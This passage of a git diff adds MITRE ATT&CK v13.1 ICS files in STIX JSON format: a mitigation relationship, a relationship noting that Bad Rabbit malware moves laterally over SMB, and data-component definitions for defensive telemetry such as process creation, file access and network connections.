"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json new file mode 100644 index 0000000000000000000000000000000000000000..be3286ed51a6ed96161f46ede52de353ed73759b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--8f473458-4475-4ce2-a345-8b3839b5bba5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff3f0668-98df-44c1-88c2-711f05720eb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.060Z", + "relationship_type": "mitigates", + "description": "Restrict configurations changes and firmware updating abilities to only authorized individuals.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json new file mode 100644 index 0000000000000000000000000000000000000000..befda62f01344d15810efc400f4a53d817352f35 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dfb1013c-0f53-4ca3-b393-1795aed32ea1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:37.216Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) can move laterally through industrial networks by means of the SMB service. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json new file mode 100644 index 0000000000000000000000000000000000000000..11f7d88888673b069f4454dfd1d0d22f0761d720 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3f98e79d-b060-4d21-9939-fa3e5f82ec21", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json new file mode 100644 index 0000000000000000000000000000000000000000..d83ca44923920d19415815b49c813b32cf081b2d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--a989723d-59c1-4015-b9bf-c3ea5814a323", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json new file mode 100644 index 0000000000000000000000000000000000000000..3a7368adfa3c126909e740fd0f26c428f7df0513 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ee065291-1eb2-435f-8476-778e909142e8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json new file mode 100644 index 0000000000000000000000000000000000000000..2a7f9ed54bd432f37924f7ea271dd5233f84dfbe --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--23cd6758-091f-430b-aeb8-c9b3e0759bf0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json new file mode 100644 index 0000000000000000000000000000000000000000..4f15b59d382bc5616ce21017f6870bdbc96d1010 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3bad91a0-93d7-444f-b0a7-226715e75e6b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json new file mode 100644 index 0000000000000000000000000000000000000000..77005b8efb341db69f9b1e53437fcec690c44ccd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--78e62ec6-1854-47e3-aa4d-23001b840577", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json new file mode 100644 index 0000000000000000000000000000000000000000..fdb3c980049b3f61f56415ca9502441b43968a11 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--0015a87f-b2ff-421b-8735-42d4b5aca1a1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json new file mode 100644 index 0000000000000000000000000000000000000000..fcc48ef1c775f3039ee48fe4056da2305f681b4b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--76f75b51-932f-4822-8ae4-eec1b8804244", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json new file mode 100644 index 0000000000000000000000000000000000000000..4e850a063e82270fcc39de871482b7e75da678a7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--ec150350-edbf-45fd-bf05-d620c23bb4cb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json new file mode 100644 index 0000000000000000000000000000000000000000..67fa711c068287c22556863a9402c31a9c0fda74 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3e858804-fcca-41bd-801b-46615d5c67c4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Modification", + "description": "Changes made to a drive letter or mount point of a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json new file mode 100644 index 0000000000000000000000000000000000000000..0a6a62535599072505b5d1b7207f0da0b4d9949a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3bb7b46b-4258-4f61-91b0-b9ee6557cffc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Creation", + "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json new file mode 100644 index 0000000000000000000000000000000000000000..d4ca0961a7636e36e880a298c2e759dd1b4f74ee --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--01c6673f-cb14-4689-aacb-b79116800ad5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json new file mode 100644 index 0000000000000000000000000000000000000000..2f9f49d3dfaca39b80a11237e4fe3e0c8f67a8d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--bae4699c-7ced-46c4-be22-e59be638ce2a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Metadata", + "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json new file mode 100644 index 0000000000000000000000000000000000000000..bd8d350217021b58a31368a85b292b5126a1c72a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--681899f0-b690-45c7-ad90-3e70bfdd6dcc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Modification", + "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json new file mode 100644 index 0000000000000000000000000000000000000000..44213be1dab6bda131256e42e193afefd94c0950 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--30e87ac0-8447-4419-977c-d914b763fe68", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json new file mode 100644 index 0000000000000000000000000000000000000000..2b60fa66a066859f9deca0a8c64db6a4904d019c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e6b6cf70-631d-47a6-8d54-6ce2b67dbabd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json new file mode 100644 index 0000000000000000000000000000000000000000..eb50b60724a76b15b875d3842c08d6949ffd1996 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--16792041-3e10-4c59-aa61-6057d3af815e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 